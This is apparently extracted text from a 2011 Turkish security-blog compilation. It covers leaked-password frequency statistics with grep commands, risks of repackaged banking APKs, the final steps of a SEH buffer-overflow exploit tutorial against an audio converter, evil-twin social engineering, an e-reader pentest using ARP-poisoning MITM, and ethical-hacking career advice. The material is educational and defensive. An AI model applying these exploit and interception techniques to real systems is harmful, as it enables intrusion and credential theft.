65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 19: Hack 4 Career - 2011

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

